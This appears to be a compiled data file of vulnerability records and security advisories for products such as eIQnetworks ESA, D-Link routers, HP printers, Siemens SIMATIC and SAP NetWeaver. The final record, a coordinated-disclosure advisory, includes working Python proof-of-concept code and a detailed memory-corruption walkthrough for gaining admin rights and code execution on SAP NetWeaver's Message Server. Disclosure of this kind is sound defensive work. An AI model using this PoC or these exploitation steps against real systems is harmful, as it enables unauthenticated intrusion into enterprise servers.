var-200607-0396 Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability:  DELTAINTERVAL  LOGFOLDER  DELETELOGS  FWASERVER  SYSLOGPUBLICIP  GETFWAIMPORTLOG  GETFWADELTA  DELETERDEPDEVICE  COMPRESSRAWLOGFILE  GETSYSLOGFIREWALLS  ADDPOLICY  EDITPOLICY. TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities http://www.zerodayinitiative.com/advisories/TSRT-06-03.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of data from a LAD file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-202305-1588 D-Link DIR-2150 SetNTPServerSettings Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20553. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. HP Printers and Digital Senders are prone to a security-bypass vulnerability. An attacker may leverage the issue to remotely install malicious printer firmware. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-201706-0017 In FortiClientWindows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. fortinet's Windows for FortiClient contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiClient is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile terminal security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances
var-202305-1520 D-Link DIR-2150 SetSysEmailSettings EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20556. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202407-0490 A vulnerability has been identified in SIMATIC PCS neo V4.0 (All versions), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions < V18 Update 2). Affected applications do not properly restrict the .NET BinaryFormatter when deserializing user-controllable input. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. This is the same issue that exists for .NET BinaryFormatter https://docs.microsoft.com/en-us/visualstudio/code-quality/ca2300. SIMATIC PCS neo is a distributed control system (DCS). SIMATIC STEP 7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. Totally Integrated Automation Portal (TIA Portal) is a PC software that provides the full range of Siemens digital automation services, from digital planning, integrated engineering to transparent operation
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-202001-0833 A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 